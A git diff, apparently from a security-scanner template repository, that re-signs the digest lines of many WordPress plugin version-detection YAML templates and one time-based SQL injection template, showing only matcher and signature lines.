http/technologies/wordpress/plugins/w3-total-cache.yaml | 3 +-- .../wordpress/plugins/webp-converter-for-media.yaml | 3 +-- http/technologies/wordpress/plugins/webp-express.yaml | 3 +-- .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 3 +-- .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 3 +-- .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 3 +-- .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 3 +-- .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-payments.yaml | 3 +-- .../wordpress/plugins/woocommerce-paypal-payments.yaml | 3 +-- .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce-services.yaml | 3 +-- http/technologies/wordpress/plugins/woocommerce.yaml | 3 +-- http/technologies/wordpress/plugins/wordfence.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-importer.yaml | 3 +-- http/technologies/wordpress/plugins/wordpress-seo.yaml | 3 +-- http/technologies/wordpress/plugins/worker.yaml | 3 +-- http/technologies/wordpress/plugins/wp-crontrol.yaml | 3 +-- http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wp-file-manager.yaml | 3 +-- http/technologies/wordpress/plugins/wp-google-maps.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-logging.yaml | 3 +-- http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 3 +-- http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 3 +-- http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 3 +-- http/technologies/wordpress/plugins/wp-optimize.yaml | 3 +-- http/technologies/wordpress/plugins/wp-pagenavi.yaml | 3 +-- http/technologies/wordpress/plugins/wp-reset.yaml | 3 +-- .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 3 +-- http/technologies/wordpress/plugins/wp-rollback.yaml | 3 +-- http/technologies/wordpress/plugins/wp-seopress.yaml | 3 +-- http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 3 +-- http/technologies/wordpress/plugins/wp-smushit.yaml | 3 +-- http/technologies/wordpress/plugins/wp-statistics.yaml | 3 +-- http/technologies/wordpress/plugins/wp-super-cache.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 3 +-- http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 3 +-- http/technologies/wordpress/plugins/wpforms-lite.yaml | 3 +-- http/technologies/wordpress/plugins/wps-hide-login.yaml | 3 +-- http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 3 +-- .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 3 +-- 200 files changed, 200 insertions(+), 399 deletions(-) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 25a72a7f08..44ed081ac5 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -48,4 +48,4 @@ http: - type: dsl dsl: - "duration>=7 && duration <=16" -# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e8266a692ff2cc477215800d03fea01da4bb13c82251996b57ef4a6fc6ba63d702210095cfc9e092e7375b414bc41745d4954bf5ef0de6117040a43f83e63ebd7b7d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 12c8747910..fcbc396fcb 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022067d894a59a480f8185bd3f47b204ef496d8ca36f9839fae4124c7e3cdd716f6c022100bdf355ce60df502dc12072ce1c45a6d9c7c67ca40145f8fff8fdb12b9f527ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b73137e614c8c7901773e8cfc8b3bec90a435d6db1f3f9dc3e856b09d33260e0022067b656e6c3d1fba30a90a5fc875b28032cdb20a459c622237017c0dd8aedc5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 3ed72518ae..c16de09f4f 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fb1727303d8d8fd53dc739ec631bc73a13354d0add200b50121b78566980a0dc02202afd9ea5a072dad687b4735038c6eb33ba5e72ec499d5ee4b1294d09a2cbdc9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202920f42e5a8b013692e1ab627b3ccb335318c0be1b0c6b9c53c7164264b15260022100f1752c5cc698c59a192d92a4dbf54639decf8e753d3fd05ed6b9a78612fb1968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 13fb467dd9..3a04cd51b6 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100836a4bae257ad1e2fcba1d846b1250f18deac824c94fcaae59a1d875f49190d702201cccfae86cc06d471bf87ab012cbd798bddf5b86f8b98e35a4f48a14a987c33c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057077812779d109a6b4af7932969ca92dd9ccbdf993a902fb97ce088c582307b02207bc0a2eb4a30aa8ed8c1dc73aaf0e5f79d9497c3ffcec48cfb3157c8ee28d4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 9f78d41a92..dc900c8806 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fcf405f28c461e6e05bf56b9377541eae96bdb76e8e563a5abe89dec609ad2af022100ca86e0accbde583778147d6908be0af7cf059514685414b2abd80bf3d79127a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022003e93934b061040bd5f5d763c1f7ea9def4f55570678b070d79e6a4020f63ae5022053385fde51ff600af4a1093e1059892adfeafa4051d9333fe19dd94e8010dcfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 7ea877fcdf..1a26641cb5 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f20f395fce43690b633c95bae96692b832dc594482270e39b87c79716cd1a118022014710a1c8bcc54c551331717764d3e5d88be4e688f3bb73b71eb28da50564f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210083a1b9e4ce57d0272a0fdde8cb5f626f9a1f9d775c8348158a5989b8e5be1abd02200b9c76311f1b0237cbc3eae5322a1495cf859d8f34246251090f675d652c488f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index d581e0f70b..27ef08f1aa 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204a3d8d2afa91d97c222f054340a6be0d320ac3a5044a6a25969841b77b12c5b7022100929b0d821a67e84b20af8b9d6d0017ecd98c7776894b646f45c9e5c645984db7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100866f6a0d6f233a3e1a45bd0626e7d5c44c96256254d1981c1fe82298ea85e58b0220467f07401d5929245db38de832c868c6eb1b1bf7488c346a10f0180256251b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index cd96d1edaa..7aa72a1829 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204aa2b1e34dba7834c0d6c5a2eaf2a5d0f9e4f1f9169aa801096bcb2617a30d7a022100a5c334b1b2f2eaaff8486f1908d1936b67e9c3aea2e319d47c04c07b95d3a304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f04dfe94200780295170bef7afe0cffc0143f53ab1c2fcd6bfcc4b4f2f656292022100a1af8f283afd242bb8bfa67f5896f79cc19bf21e2198d8691ca76c45cfd24c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index ab29958f23..094ca113b4 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220020080415d0ceeee7b561e019f4018fee6def9f31444cebd631a635e1d96d0d3022100e793cdb39a3bad1a31c444f3fe14df8e996414357e7b4b9a655592a26dd1d88a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201925eb2f40b6dc970e14278c00a942438e66fc052680bc9d9423982fdca630b9022100c64cfd01ee0cc6eed5d82cbd141c1108e3f00c30d0aa0446c5eab52b7a9756a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index f46f2bab84..f7864cd714 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a1d21a563fb92425111f3f4fa238996297be5e8c81797c88f66b06e52b10b6760220633a87c3238feb02d9ce2b3651f3097a74c1052e62637e5bdb7a4ea2ad9f7a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022015d0761a0c6f5a6fc0687a99e6e9b5cdc47951b078e83632c0f27c4ae7831c0c02204310c16b1eee42d4a48e410bfae7dc377f3b74e74c6e2e5fc17f0ee2c737adb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index ab4b2d4042..c1ce5515c5 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c53549f316427688bbbd1a0bee38cfe6f0bb816a56e005de716a8bb739900473022100a4141898cd48ebbe73c3133771c579f2425e6092edf6f751b7473db708e06e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054990e71e29897cba1a16957cc6f1c3ddc8324e376f919aecf0e784790152fa402207e6df7391039154d50b5d39339f4f316edaed3d75b00cc3649fa4b143a852f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index abceedbcc4..5b800e6369 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a7ec516665275cf18974840f2055ae95eb799d68c765a4a05293d41a3dd3445c0220300d2a25f4378de8f1b830cb7b0706e02324ac991d235c11aab3cc1fdb97a5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c224470b2a2c4b5c8c5ca332b2f3567de2e72c782779062901e011e5b978bd1a022100a098b9dbb189b521c0f263359fc3d7acd6a58015e1af93e2328c59703fe20cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index ac0ca40352..e23893f1a4 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a467c4323bb06cddb66997c17655a0beb4d5883bfff18dda63c2d5755887bcbb02205c550565517c37469d46ff9ebe451fe28b4dc2bd496874873cd7c3a9bac2f5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f3603cfb6a495c693f5a4fb8d73f5ac3e91754d81bb2ac3f24ffafd20f35d3402207767dc9c7142bf8a789d3e1ec8827aafda8e0799de9b77a9f24fcba767215a59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 9de42ac6c8..91abc5af65 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dcb3e41e2f45e39a336cfdf69bb16431d464f30381213ea4a4c7cc2d1c8ae955022100ee0e9f2a4eb372b70424497d63a7363cff86268150cdec5754dceeab2f737e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004645c4e6bc8559ff4ca457e7ec7795e4f4e6120ee183103ba89cee3401acc2902200b87fb618ac12d180bb038c2b1dbf047778d1f62495bbf92784b4f748aab2f25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index a1f8d58726..ba8c4c6e9e 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008c946ccab5d142806073881c50c6d5678fcf61211111f00ec5e8a3f1f872f1f3022100dd295c97d17f2975280ce3e0c47d3cc9374570d98911685cab986a738ae894dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203abd3a60c262143b6acefe64d8b8f2a754fa6a3dfb3560f8ae321b6faf9f595302201cd2b820d57d84a150cd27a96f4f55f2d1385af3a2571e65cd9527e431994301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index b8e32c7aa3..ba181e4874 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f40603d6b6ccdb92bde7b723465098739589e26a6f70e4d773021a9452395786022070d2745f1d27cc481b82ea547f09b8da227372180400051254059b08085c9cf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008b39a8ca2d1f5b798383f93e95989404aaf82720378e46dab6a15325179faeba022100e48a75cf2824a104f243a336e2e2ac0600ac48c813f875ac52907431718cb47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 392b9add09..f609ffc2a0 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207210aa14e231fcca4e4848e86ffeeef7cb3c6081f08c33709dc64d99f08f29c7022100eb06a4a08d0ec96bc221e3a5c5a2c5b0e869984a7de9505b99f71b49e365ecd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e2683b59850fb0599bdefc203685fd65663183cd93b44802fda888cecd003f0022008cba99806344a29372d3f8e9f456aba4d0f4e853f2b33aa91ff4615cfa759d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index eeab5f0256..620c920550 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204e076d6e98c547384680bf111d8e69e7ca4a14eeb9da21c443e86a349af09f0a022100e20a845c8e26112994c4f5a3b48f8665ddc7ac0adc79cbc1751488406712ef01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022000a80771d652297bbb36ba952f2ab4179f2bf16103073ba38a91203cb12ce50e02204cf4c80bf42a68733cbee9a0b43467059eebafa454cd55b1c6a150abe7c9fa7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 5bbcdc66d0..266fb74e27 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201b4df66c9e59936d4ff6f40a6e85f8e3cdf78912ddacde9944bd25dbd3424ec2022055c079f2c136dfe5494abb6d83f3217f6a3b6f61edf210d34dd847cb21f528a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204fc72c7c54a5c4895726ff562d904e606397f4daf13abc24f10e8d6d145d5aa502203bac121b6082b62035b149c9a533fbe95054263b16aa7a098dbd6cbbd3793283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index bdfacde1f4..f281771586 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210086988b6efcd1141893e33a4220983a543c8250911f4054da8bb9d892e921ad4a022100ae73a9e98d98c6d11ebf3a3582629cf3c5f745facb8308a6ef3468cfe05aee64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022053d8d775f4c2da6ab793936102465c09ad5b6f325436ba58bd1bbe4447ef1c69022040051205aaa368b1265705a3b2ce2334b511600598e27f9942b1d6b4c6de381b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 30a55d1b5d..f567011582 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100cf9b1703c0a74700f69f51c27929bd6e0e4df21b7f0c75905da720dd28433fd5022023635f8bfd5ea0bdc1460d2a1b1d9cdeda44711791d3ca62c9b7b07175eb32ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009183ad26829df8e0207645c9ffb69f9c1bd2270dcf2cc308a00a886caa1f6108022100cd85a671c986b59ed183d4ea5d75c1433e004c40607a94c03cec553a5a739cc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 0b12e46de3..f278f03681 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022070ae72bfe9e99dc2c7b1f93e80cb54a64b6184f147b89cd7804128598f5c5e640220204ac57b72ed4d66058443b658b5770381586497405c6ffc79d3f7df3253b39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd647eb856da6b75e6c07fa16bbe279bde07a1f84f134d947f07c4969a5ccd2902205cfdf33ca31917ba0dea2b3f6f221566eb8685cce03f719cf5a48cb93e9bb61b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 6850b52b32..4a99ac4c4a 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201a67eed7e4dc051ac145b0ed06aabfab4d43f38e29ef899eeae432415d7e4d0102207d3ec956b29df4845c757d869c43952dbe632470d1886e07ef0e2857cb042580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022061834ef92a7fcd36418fc84873faa9df57c1f1a38c8ae9b2b682630d2413361202200878e776c4a053ada5ffe24ccf9076ba6ab8a54077fd3ba6df3d9458415e6e1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index ecc37f8dd2..562005baa4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204236ab02ebfcd21b6b4003ca3ab32867ab1d159a7532af1c54087f2d9eabead7022100b02e7457e862276020ffe5510707686674ece4a858077f9c664915168b768ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204e311461fa44336d780371acf43ffc07651f43944811c0611865d2b03e06d9a402200d7455c866801c1788e15886554ac5d05adebfd688733a296f5bfc5a93e2dc96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 329f3a288a..0f39d2b12f 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d4c37a9eff836c38c389234925604e0341146e02a40b718ba38fb77d7e6c3a21022100d814d168e0cf85ea46923a8ccb45e4998465240945303c00d89d58eaca807bf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e3bc7547d9878df142ed4a9096973dd612ea65c7e2ba2db940608bfbd21b21b302204e9b49d0fe633ad7b0e38ae65b5362a6fa94aeed4e279f6e84c397f9dc398d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c88cc5d4d7..d5481aaa95 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100986a758101f067d742b9a39c47f9036d6430c7913d9f02cb1303628b8b1b008c02202a7fdca97b7c266e18ee4caddd081e090a03f7b3721b96c5e632984cc9a0a2f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202473b9a58028fcb6e5b6881830a54e4a910ccb9f34b4f587bee5758a8a6cdad502210084671776c7e3679c5f742de31c45c508cc2ca4446e056a83ff94685f3742ca74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index b66ccccb1f..616edc4084 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a915656bda430482b6e70dc3d6b32a1dab6895c57d201722ae4b8febd228f53a022100ec7a0cb8ef0e6ff7934b5a57a78ae2c5b75bb56c0597bc56cb90d83761255ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009305a82e38c20c4dd22af3d1664f1b51ec7a6afc100922ecfc39f4c66632630702201b47254e203716996a3c3f34bbdc96f50b08622162723f814f5e3f58e45b91b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 67b6490da3..0b36df7802 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205e6e4301153f03a3a191a04c568382bc2dcef44b2b842419d637b983bd889282022004885f776dc1365336f719802838564dfb6207af2681c9f62f134e6306869611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2a2532b4dffd18a3642a270f0d5888084b6131cb8c387ccb9e13e7f2ffb52f0022100b5f316ecbf6935cf104656183b386cb86f600fdea44aaeaff4cd124611111380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 1108f07635..f44e1389ea 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a64efdfc9ed30e258aca50ea336142504077ef2d7de85f7e5a4e7803d5d1c5f002204a0650645b7323311a7c994224e1df054229e5bd297793dacafcd18af916b3f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022054dd94f232f431cf5b23d7e16f800ebd80b86a5f2291f409fe363ab325b752e502206165717c262f7bae9e6ddf0d197818c2b6bbe74dcb936a5bc3443d60074e0d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1260647678..8c9cafe762 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a796129c13c6e65e75c0a0c0645564dbe5a951d06386dcba8fc6018696c692aa022100dcde6f353aa8a067b01283c81e8b54387d4934c33936f66eff440caa726181f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bfb4681700fbfef19216573f9c8e1b472cd14137fe16e8c108f90e4af147a81022100d176db333bda54996181bd0f4f7510bf15e153818e977cc0338503e122ce8de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 0a831f8d23..0b51d90888 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 